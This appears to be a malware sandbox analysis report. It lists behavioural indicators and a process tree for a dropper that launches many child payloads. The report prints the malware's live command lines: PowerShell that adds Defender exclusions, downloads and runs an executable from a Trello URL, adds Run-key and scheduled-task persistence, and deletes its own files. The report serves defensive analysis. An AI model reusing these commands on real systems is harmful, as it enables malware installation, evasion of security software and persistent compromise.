Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4896 medcallaboratory5.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4880 New Text Document.exe Token: SeDebugPrivilege 2364 cccc.exe Token: SeDebugPrivilege 5048 powershell.exe Token: SeDebugPrivilege 2408 xIPJVPDq.exe Token: SeDebugPrivilege 2796 jIsBEpHW.exe Token: SeDebugPrivilege 2936 crypted6077866846MVYQY.exe Token: SeDebugPrivilege 4128 mQxBvlTA.exe Token: SeDebugPrivilege 2648 Tester.exe Token: SeDebugPrivilege 988 svchost.exe Token: SeDebugPrivilege 1116 powershell.exe Token: SeBackupPrivilege 3232 vssvc.exe Token: SeRestorePrivilege 3232 vssvc.exe Token: SeAuditPrivilege 3232 vssvc.exe Token: SeDebugPrivilege 3740 powershell.exe Token: SeIncreaseQuotaPrivilege 3740 powershell.exe Token: SeSecurityPrivilege 3740 powershell.exe Token: SeTakeOwnershipPrivilege 3740 powershell.exe Token: SeLoadDriverPrivilege 3740 powershell.exe Token: SeSystemProfilePrivilege 3740 powershell.exe Token: SeSystemtimePrivilege 3740 powershell.exe Token: SeProfSingleProcessPrivilege 3740 powershell.exe Token: SeIncBasePriorityPrivilege 3740 powershell.exe Token: SeCreatePagefilePrivilege 3740 powershell.exe Token: SeBackupPrivilege 3740 powershell.exe Token: SeRestorePrivilege 3740 powershell.exe Token: SeShutdownPrivilege 3740 powershell.exe Token: SeDebugPrivilege 3740 powershell.exe Token: SeSystemEnvironmentPrivilege 3740 powershell.exe Token: SeRemoteShutdownPrivilege 3740 powershell.exe Token: SeUndockPrivilege 3740 powershell.exe Token: SeManageVolumePrivilege 3740 powershell.exe Token: 33 3740 powershell.exe Token: 34 3740 powershell.exe Token: 35 3740 powershell.exe Token: 36 3740 powershell.exe Token: SeDebugPrivilege 1392 powershell.exe Token: SeDebugPrivilege 280 powershell.exe Token: SeDebugPrivilege 4072 powershell.exe Token: SeIncreaseQuotaPrivilege 4072 powershell.exe Token: SeSecurityPrivilege 4072 powershell.exe Token: SeTakeOwnershipPrivilege 4072 powershell.exe Token: SeLoadDriverPrivilege 4072 powershell.exe Token: SeSystemProfilePrivilege 4072 powershell.exe Token: SeSystemtimePrivilege 4072 powershell.exe Token: SeProfSingleProcessPrivilege 4072 powershell.exe Token: SeIncBasePriorityPrivilege 4072 powershell.exe Token: SeCreatePagefilePrivilege 4072 powershell.exe Token: SeBackupPrivilege 4072 powershell.exe Token: SeRestorePrivilege 4072 powershell.exe Token: SeShutdownPrivilege 4072 powershell.exe Token: SeDebugPrivilege 4072 powershell.exe Token: SeSystemEnvironmentPrivilege 4072 powershell.exe Token: SeRemoteShutdownPrivilege 4072 powershell.exe Token: SeUndockPrivilege 4072 powershell.exe Token: SeManageVolumePrivilege 4072 powershell.exe Token: 33 4072 powershell.exe Token: 34 4072 powershell.exe Token: 35 4072 powershell.exe Token: 36 4072 powershell.exe Token: SeDebugPrivilege 5028 BrawlB0t.exe Token: SeDebugPrivilege 2332 powershell.exe Token: SeDebugPrivilege 3748 RegSvcs.exe Token: SeDebugPrivilege 4304 RuntimeBroker2.exe Token: SeDebugPrivilege 1392 svchost.exe -
Suspicious use of FindShellTrayWindow 18 IoCs
pid Process 2244 wininit.exe 2244 wininit.exe 4896 medcallaboratory5.exe 4896 medcallaboratory5.exe 2336 BroomSetup.exe 2336 BroomSetup.exe 2336 BroomSetup.exe 2336 BroomSetup.exe 2336 BroomSetup.exe 2336 BroomSetup.exe 2336 BroomSetup.exe 5876 u88.1.exe 5876 u88.1.exe 5876 u88.1.exe 5876 u88.1.exe 5876 u88.1.exe 5876 u88.1.exe 5876 u88.1.exe -
Suspicious use of SendNotifyMessage 18 IoCs
pid Process 2244 wininit.exe 2244 wininit.exe 4896 medcallaboratory5.exe 4896 medcallaboratory5.exe 2336 BroomSetup.exe 2336 BroomSetup.exe 2336 BroomSetup.exe 2336 BroomSetup.exe 2336 BroomSetup.exe 2336 BroomSetup.exe 2336 BroomSetup.exe 5876 u88.1.exe 5876 u88.1.exe 5876 u88.1.exe 5876 u88.1.exe 5876 u88.1.exe 5876 u88.1.exe 5876 u88.1.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1392 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4880 wrote to memory of 2364 4880 New Text Document.exe 72 PID 4880 wrote to memory of 2364 4880 New Text Document.exe 72 PID 4880 wrote to memory of 2364 4880 New Text Document.exe 72 PID 2364 wrote to memory of 1436 2364 cccc.exe 73 PID 2364 wrote to memory of 1436 2364 cccc.exe 73 PID 2364 wrote to memory of 1436 2364 cccc.exe 73 PID 1436 wrote to memory of 5048 1436 cmd.exe 125 PID 1436 wrote to memory of 5048 1436 cmd.exe 125 PID 1436 wrote to memory of 5048 1436 cmd.exe 125 PID 4880 wrote to memory of 4128 4880 New Text Document.exe 76 PID 4880 wrote to memory of 4128 4880 New Text Document.exe 76 PID 4880 wrote to memory of 4128 4880 New Text Document.exe 76 PID 4880 wrote to memory of 2408 4880 New Text Document.exe 77 PID 4880 wrote to memory of 2408 4880 New Text Document.exe 77 PID 4880 wrote to memory of 2408 4880 New Text Document.exe 77 PID 2408 wrote to memory of 2796 2408 xIPJVPDq.exe 78 PID 2408 wrote to memory of 2796 2408 xIPJVPDq.exe 78 PID 4880 wrote to memory of 2936 4880 New Text Document.exe 79 PID 4880 wrote to memory of 2936 4880 New Text Document.exe 79 PID 4880 wrote to memory of 2936 4880 New Text Document.exe 79 PID 4880 wrote to memory of 4908 4880 New Text Document.exe 81 PID 4880 wrote to memory of 4908 4880 New Text Document.exe 81 PID 4880 wrote to memory of 2244 4880 New Text Document.exe 83 PID 4880 wrote to memory of 2244 4880 New Text Document.exe 83 PID 4880 wrote to memory of 2244 4880 New Text Document.exe 83 PID 4880 wrote to memory of 4104 4880 New Text Document.exe 84 PID 4880 wrote to memory of 4104 4880 New Text Document.exe 84 PID 4880 wrote to memory of 4104 4880 New Text Document.exe 84 PID 4880 wrote to memory of 5080 4880 New Text Document.exe 85 PID 4880 wrote to memory of 5080 4880 New Text Document.exe 85 PID 4880 wrote to memory of 5080 4880 New Text Document.exe 85 PID 5080 wrote to memory of 5004 5080 ISetup8.exe 86 PID 5080 wrote to memory of 5004 5080 ISetup8.exe 86 PID 5080 wrote to memory of 5004 5080 ISetup8.exe 86 PID 4880 wrote to memory of 5088 4880 New Text Document.exe 88 PID 4880 wrote to memory of 5088 4880 New Text Document.exe 88 PID 4880 wrote to memory of 3108 4880 New Text Document.exe 89 PID 4880 wrote to memory of 3108 4880 New Text Document.exe 89 PID 4880 wrote to memory of 3016 4880 New Text Document.exe 90 PID 4880 wrote to memory of 3016 4880 New Text Document.exe 90 PID 4880 wrote to memory of 3016 4880 New Text Document.exe 90 PID 4880 wrote to memory of 2648 4880 New Text Document.exe 91 PID 4880 wrote to memory of 2648 4880 New Text Document.exe 91 PID 4880 wrote to memory of 988 4880 New Text Document.exe 92 PID 4880 wrote to memory of 988 4880 New Text Document.exe 92 PID 3016 wrote to memory of 3168 3016 ISetup2.exe 93 PID 3016 wrote to memory of 3168 3016 ISetup2.exe 93 PID 3016 wrote to memory of 3168 3016 ISetup2.exe 93 PID 5048 wrote to memory of 1116 5048 powershell.exe 94 PID 5048 wrote to memory of 1116 5048 powershell.exe 94 PID 5048 wrote to memory of 1116 5048 powershell.exe 94 PID 988 wrote to memory of 920 988 svchost.exe 95 PID 988 wrote to memory of 920 988 svchost.exe 95 PID 2648 wrote to memory of 3740 2648 Tester.exe 100 PID 2648 wrote to memory of 3740 2648 Tester.exe 100 PID 5048 wrote to memory of 1392 5048 powershell.exe 109 PID 5048 wrote to memory of 1392 5048 powershell.exe 109 PID 5048 wrote to memory of 1392 5048 powershell.exe 109 PID 5048 wrote to memory of 280 5048 powershell.exe 104 PID 5048 wrote to memory of 280 5048 powershell.exe 104 PID 5048 wrote to memory of 280 5048 powershell.exe 104 PID 2648 wrote to memory of 4072 2648 Tester.exe 105 PID 2648 wrote to memory of 4072 2648 Tester.exe 105 PID 5048 wrote to memory of 2268 5048 powershell.exe 107 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe -
outlook_win_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RuntimeBroker2.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Users\Admin\AppData\Local\Temp\a\cccc.exe"C:\Users\Admin\AppData\Local\Temp\a\cccc.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell.exe -Command Add-MpPreference -ExclusionPath %localappdata%; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value %localappdata%'\RuntimeBroker2.exe'; timeout /t 1 >nul;start RuntimeBroker2.exe;3⤵
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local'\RuntimeBroker2.exe'; timeout /t 1 ;start RuntimeBroker2.exe;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess RuntimeBroker2.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1116
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1392
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local\RuntimeBroker2.exe5⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:280
-
-
C:\Windows\SysWOW64\timeout.exe"C:\Windows\system32\timeout.exe" /t 15⤵
- Delays execution with timeout.exe
PID:2268
-
-
C:\Users\Admin\AppData\Local\RuntimeBroker2.exe"C:\Users\Admin\AppData\Local\RuntimeBroker2.exe"5⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4304 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker2';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker2' -Value '"C:\Users\Admin\AppData\Local\RuntimeBroker2.exe"' -PropertyType 'String'6⤵
- Adds Run key to start application
PID:1076
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\mQxBvlTA.exe"C:\Users\Admin\AppData\Local\Temp\a\mQxBvlTA.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4128
-
-
C:\Users\Admin\AppData\Local\Temp\a\xIPJVPDq.exe"C:\Users\Admin\AppData\Local\Temp\a\xIPJVPDq.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Users\Admin\AppData\Local\Temp\jIsBEpHW.exe"C:\Users\Admin\AppData\Local\Temp\jIsBEpHW.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\crypted6077866846MVYQY.exe"C:\Users\Admin\AppData\Local\Temp\a\crypted6077866846MVYQY.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
C:\Users\Admin\AppData\Local\Temp\a\i1gcbW1E.exe"C:\Users\Admin\AppData\Local\Temp\a\i1gcbW1E.exe"2⤵
- Executes dropped EXE
PID:4908
-
-
C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2244
-
-
C:\Users\Admin\AppData\Local\Temp\a\1234.exe"C:\Users\Admin\AppData\Local\Temp\a\1234.exe"2⤵
- Executes dropped EXE
PID:4104
-
-
C:\Users\Admin\AppData\Local\Temp\a\ISetup8.exe"C:\Users\Admin\AppData\Local\Temp\a\ISetup8.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Users\Admin\AppData\Local\Temp\u3x4.0.exe"C:\Users\Admin\AppData\Local\Temp\u3x4.0.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5004
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\test2.exe"C:\Users\Admin\AppData\Local\Temp\a\test2.exe"2⤵
- Executes dropped EXE
PID:5088
-
-
C:\Users\Admin\AppData\Local\Temp\a\1111.exe"C:\Users\Admin\AppData\Local\Temp\a\1111.exe"2⤵
- Executes dropped EXE
PID:3108
-
-
C:\Users\Admin\AppData\Local\Temp\a\ISetup2.exe"C:\Users\Admin\AppData\Local\Temp\a\ISetup2.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Users\Admin\AppData\Local\Temp\u2bs.0.exe"C:\Users\Admin\AppData\Local\Temp\u2bs.0.exe"3⤵
- Executes dropped EXE
PID:3168
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Tester.exe"C:\Users\Admin\AppData\Local\Temp\a\Tester.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\svchost.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4072
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Public\svchost.exe"3⤵
- Creates scheduled task(s)
PID:920
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\555.exe"C:\Users\Admin\AppData\Local\Temp\a\555.exe"2⤵
- Executes dropped EXE
PID:1352
-
-
C:\Users\Admin\AppData\Local\Temp\a\Document.exe"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4172 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\Document.exe"3⤵PID:288
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"3⤵PID:3792
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA841.tmp"3⤵
- Creates scheduled task(s)
PID:2672
-
-
C:\Users\Admin\AppData\Local\Temp\a\Document.exe"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"3⤵
- Executes dropped EXE
PID:4652 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"' & exit4⤵PID:3992
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"'5⤵
- Creates scheduled task(s)
PID:312
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBDAE.tmp.bat""4⤵PID:1460
-
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:268
-
-
C:\Users\Admin\AppData\Roaming\msdtc.exe"C:\Users\Admin\AppData\Roaming\msdtc.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:380 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\msdtc.exe"6⤵PID:1740
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"6⤵PID:868
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1A35.tmp"6⤵
- Creates scheduled task(s)
PID:1988
-
-
C:\Users\Admin\AppData\Roaming\msdtc.exe"C:\Users\Admin\AppData\Roaming\msdtc.exe"6⤵
- Executes dropped EXE
PID:1892
-
-
C:\Users\Admin\AppData\Roaming\msdtc.exe"C:\Users\Admin\AppData\Roaming\msdtc.exe"6⤵
- Executes dropped EXE
PID:1716
-
-
C:\Users\Admin\AppData\Roaming\msdtc.exe"C:\Users\Admin\AppData\Roaming\msdtc.exe"6⤵
- Executes dropped EXE
PID:4992
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe"C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BrawlB0t.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'3⤵PID:5020
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive.exe"3⤵
- Creates scheduled task(s)
PID:4292
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4896 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3748
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\securitycheck.exe"C:\Users\Admin\AppData\Local\Temp\a\securitycheck.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1808
-
-
C:\Users\Admin\AppData\Local\Temp\a\PrintSpoofer.exe"C:\Users\Admin\AppData\Local\Temp\a\PrintSpoofer.exe"2⤵
- Executes dropped EXE
PID:2860
-
-
C:\Users\Admin\AppData\Local\Temp\a\Adobe_update.exe"C:\Users\Admin\AppData\Local\Temp\a\Adobe_update.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2928 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Modifies system certificate store
PID:3704
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 7963⤵
- Program crash
PID:4460
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Retailer_prog.exe"C:\Users\Admin\AppData\Local\Temp\a\Retailer_prog.exe"2⤵
- Executes dropped EXE
PID:352
-
-
C:\Users\Admin\AppData\Local\Temp\a\BroomSetup.exe"C:\Users\Admin\AppData\Local\Temp\a\BroomSetup.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2336 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD13⤵PID:5252
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\alexxxxxxxx.exe"C:\Users\Admin\AppData\Local\Temp\a\alexxxxxxxx.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3264 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3864
-
C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"4⤵
- Executes dropped EXE
PID:1892
-
-
C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"4⤵
- Executes dropped EXE
PID:1588
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"4⤵PID:5216
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵PID:3108
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe"C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe"2⤵
- Executes dropped EXE
PID:200
-
-
C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe"C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe"2⤵
- Executes dropped EXE
PID:284 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe3⤵PID:4304
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30004⤵
- Runs ping.exe
PID:2724
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\1111.exe"C:\Users\Admin\AppData\Local\Temp\a\1111.exe"2⤵
- Executes dropped EXE
PID:2728 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 1483⤵
- Program crash
PID:4088
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\new1.exe"C:\Users\Admin\AppData\Local\Temp\a\new1.exe"2⤵
- Executes dropped EXE
PID:3168
-
-
C:\Users\Admin\AppData\Local\Temp\a\swiiii.exe"C:\Users\Admin\AppData\Local\Temp\a\swiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:240 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
PID:656
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ISetup5.exe"C:\Users\Admin\AppData\Local\Temp\a\ISetup5.exe"2⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:296 -
C:\Users\Admin\AppData\Local\Temp\u88.0.exe"C:\Users\Admin\AppData\Local\Temp\u88.0.exe"3⤵
- Executes dropped EXE
PID:5548
-
-
C:\Users\Admin\AppData\Local\Temp\u88.1.exe"C:\Users\Admin\AppData\Local\Temp\u88.1.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5876
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe"C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5324 -
C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"3⤵
- Executes dropped EXE
PID:5640
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\crypted_097f1784.exe"C:\Users\Admin\AppData\Local\Temp\a\crypted_097f1784.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5664 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5964
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5664 -s 7643⤵
- Program crash
PID:5984
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\june.exe"C:\Users\Admin\AppData\Local\Temp\a\june.exe"2⤵
- Executes dropped EXE
PID:6004 -
C:\Users\Admin\AppData\Local\Temp\is-FN0E7.tmp\june.tmp"C:\Users\Admin\AppData\Local\Temp\is-FN0E7.tmp\june.tmp" /SL5="$6019A,4053053,54272,C:\Users\Admin\AppData\Local\Temp\a\june.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5176 -
